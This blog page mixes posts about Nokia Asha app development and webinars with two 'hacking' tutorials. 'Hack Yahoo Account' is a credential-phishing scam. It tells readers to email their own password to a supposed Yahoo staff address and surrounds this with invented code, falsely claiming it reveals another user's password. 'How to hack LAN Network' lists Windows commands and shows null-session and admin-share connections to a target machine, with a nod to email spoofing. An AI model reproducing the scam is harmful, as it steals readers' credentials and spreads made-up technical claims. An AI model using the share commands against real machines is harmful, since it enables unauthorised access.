Pages

Sunday 5 January 2014

CaloriCalc : NOKIA Asha App

"CaloriCalc" is a Health&Fitness App.It provide Daily Calorie need of User.

Saturday 14 December 2013

NOKIA Asha Webinar : Great way of Learning


          NOKIA is providing great online Webinar which are excellent source of knowledge.  These Webiner cover all important topics which require to develop great App for NOKIA Asha Devices and Window Phone. These Webiner are about new Features included , new platform Lunched and update made from time to time.These Webinar enable a person to attend a presentation and clear doubt though online group chatting.

I have attended NOKIA Asha Webinar in the Past. It was great learning experience and very helpful to in developing useful Apps for NOKIA Asha device. Here are the 6 Webinar I attended:

1." Introduction to the Nokia Asha SDK 1.0" : this webinar about new SDK available for new Asha 501 devices. this cover new Features , improvements . it also explain of controls it contain and how to use them in a App. This webinar was a excellent help for developer to start development for the new Asha Device.

2. "Introduction to the NOKIA Asha UI" : this cover how to create User Interface of Application for Asha 501 Device. it explain about the changes made in the controls so that they can better suit Asha Devices. It also cover some portion of how to porting existing java to Asha Platform.

3 "LWUIT for the Nokia Asha software platform 1.0" :  This Webinar covers new LWUIT components specially lunched for Asha Device. it explain in details about New components added to LWUIT like ContextMenu, TimePicker, DatePicker etc. and their working.

4. "Localising apps for new Nokia Asha phones" : This Webinar explain how to create Apps which support Internationalization . In other words how content of the App depending upon country in which App is running. by implementing this service it is possible to change the language or style of content. it shows how can we implement this in Asha App and translate content in different languages by usging services provide by gerlocationiztion.com

5. "Design Tips for NOKIA Asha Game Developer" : This Webinar provide very useful tips in the field of Game Development like Do and Dont in game development. Tips provided very useful, these helps to make one's game very successfully. In this nothing new was Explained but how to use existing knowledge to create better is explained. This was ny favourite Webinar.

6. "Camera, imaging on Nokia Asha platform 1.0" : This Webinar cover Image capturing, video Recording, Image Scaling API. this explain JSR, API and step by step code for capturing, recording and scaling work. 

Attending NOKIA Webinar is a great experience and fun. In Webinar Everything is Explained completely. Each new Feature is explained and then implemented my instructor so that we later not face any problem and even after that anybody face any problem, Group chat facility is provided to ask Questions.

 List of all the future Webinar and detail is provided on the NOKIA Developer site.  anybody can register. Generally Each is available in two time slot so that if a Person is not able to attend at particular time He/She can attend at other timing. and if someone is not able to attend Webinar at all then   recording and presentation of all Past Webinar is also provide so that developer can Watch and Learn.

Registering for an Webinar is very easy. with each webinar Register button is provided to register for that Webinar. on clicking that button. on clicking button user us redirected to adobeconnact page where user can register by filling own Details. I email is received by user with conformation details of registration. One Day before a reminder send to the user so that user can attend the Webinar on Time.  

In Last, i want to say that NOKIA Webinars are very useful and great source knowledge. NOKIA is really  doing hard work to keep Developer updated. NOKIA keep it up.


Thanks
SANDEEP SHARMA 

Monday 14 March 2011

Hack Yahoo Account


It is possible and it is easy.
 This is how it is done:
STEP 1- Log in to your own yahoo account. Note: Your
account must be at
least 30 days old for this to work.
STEP 2- Once you have logged into your own account,
compose/write an e-mail
to: RETRIVE_PASS_KEY_CGI_BIN@yahoo.com This is a mailing
address to the Yahoo
Staff. The automated server will send you the password
that you have
'forgotten', after receiving the information you send
them.
STEP 3- In the subject line type exactly: " PASSWORD
RECOVERY "
STEP 4- On the first line of your mail write the email
address of the person
you are hacking.
STEP 5- On the second line type in the e-mail address
you are using.
STEP 6- On the third line type in the password to YOUR
email address (your
OWN password). The computer needs your password so it
can send a JavaScript
from your account in the Yahoo Server to extract the
other email addresses
password. In other word the system automatically
checks your password to
confirm the integrity of your status.
The process will be done automatically by the user
administration server. STEP 7- The final step before
sending the mail is,
type on the fourth line the following code exactly:
cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
{simply copy and paste above.}
so for example if your yahoo id is :
David_100@yahoo.com and your password
is: David and the email address you want to hack is:
test@yahoo.com then
compose the mail as below:
To: RETRIVE_PASS_KEY_CGI_BIN@yahoo.com
bcc: cc: (Don't write anything in cc,bcc field)
Subject: " PASSWORD RECOVERY "
test@yahoo.com
David_100@yahoo.com
David
cgi-bin_RETRIVE_PASS_KEY_CGI_BIN/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
{simply copy and paste above.}
The password will be sent to your inbox in a mail
called "System Reg
Message" from "System. When my friend showed me how
to do this I thought it was too good a trick to keep
to myself!
Now enjoy!

How to hack LAN Network


First, open your Network Connection and right click and select Properties. Then Select TCP/IP and click on Properties again. Now Click on Advanced and WINS tab. Select Default for NeBIOS.
Now back to the main Local Area Connection window, select File and Print Sharing for Microsoft Networks and hit enter.
This is just to make sure you have NetBIOS enabled. We will have some fun with NetBIOS on CMD.
First thing you need to know is some very helpfull commands to use on CMD(Command Prompt).
In case you don’t know how to get CMD open in your box, then click on Start, then Run, then type “cmd” (no quotes, off course… you know the drill).
Back to commands:
CODE
nslookup
net view
net use
net user
ping
tracert
arp
route
nbtstat
netstat
ipconfig
In case you don’t know some of them, then just type the command on CMD and hit enter. A little help will show up in your screen. Read it and understand what the command does.
Lets start easy…
1) ping : This command will allow you to know if the host you pinging is alive, which means if it is up at the time of executing the “ping” command.
CODE
ping x.x.x.x (x is the IP address)
or
ping www.whatever.com (www.whatever.com is the website you want to ping, but you don’t know the IP)
OBS: Keep in mind that if the host you pinging is blocking ICMP packets, then the result will be host down.
2) nslookup : This command has many functionalities.
One is for resolving DNS into IP.
Lets say you know the website URL but you don’t know its IP(and you want to find out).
nslookup www.whatever.com (www.whatever.com is the website you want to find out the IP)
Now, another really nice function of nslookup is to find out IP of specific Mail Severs.
QUOTE
nslookup (enter)
set type=mx (enter)
yahoo.com
This command will give you the mail server IP of yahoo.com. You can use whatever server you want and if it is listed on DNS, then you get the IP. Simple, isn’t it?
OK, now why would you want to have an IP of a mail server?
To send spoofed mail to your friends or even for SE.
In case you looking for “How to spoof email”, then look for my “How to spoof email tutorial” http://www.infowar.com/forums/showthread.p…p;threadid=2360
3) tracert : This command will give you the hops that a packet will travel to reach its final destination.
OBS: This command is good to know the route a packet takes before it goes to the target box.
CODE
tracert x.x.x.x (x is the IP address)
or
tracert www.whatever.com (www.whatever.com is the website you don’t know the IP)
4) arp : This command will show you the arp table. This is good to know if someone is doing arp poisoning in your LAN.
QUOTE
arp -a
5) route : This command will show you the routing table, gateway, interface and metric.
CODE
route print
6) ipconfig : This command will show tons of very helpful things.
Your IP, gateway, dns in use.
CODE
ipconfig
or
CODE
ipconfig /all
this command will give all that info but for all networks you might have it.
Also, in case you have a dynamic IP and want to change it, then type…
CODE
ipconfig /release (this will release your IP)
ipconfig /renew (this will renew your iP)
OBS: Keep in mind that those commands will change your IP, but the new IP will still be tighed up to you. So don’t do anything stupid.
7) netstat : This command will show you connection to your box.
CODE
netstat
or
CODE
netstat -a (this will show you all the listening ports and connection with DNS names)
netstat -n (this will show you all the open connection with IP addresses)
netstat -an (this will combined both of the above)
8)nbtstat : This command will show you the netbios name of the target box.
CODE
nbtstat -A x.x.x.x (x is the IP address)
nbtstat -a computername
net view x.x.x.x or computername (will list the available sharing folders on the target box)
Now some hints:
CODE
net use \ipaddressipc$ “” /user:administrator
(this command will allow you to connect to the target box as administrator)
Now if you want to connect to the target box and browse the entire C drive, then use this command:
CODE
net use K: \computernameC$
(this will create a virtual drive on your “my computer” folder)
OBS: Keep in mind that this will only works if the target box doesn’t have an administrator password set.
And least but not last, the “help” command.
CODE
whatevercommand /help
CODE
whatevercommand /?
This command will help you to understand what it does and all the switchs available for each command.
Very useful if you know the command, but forgot the right switch.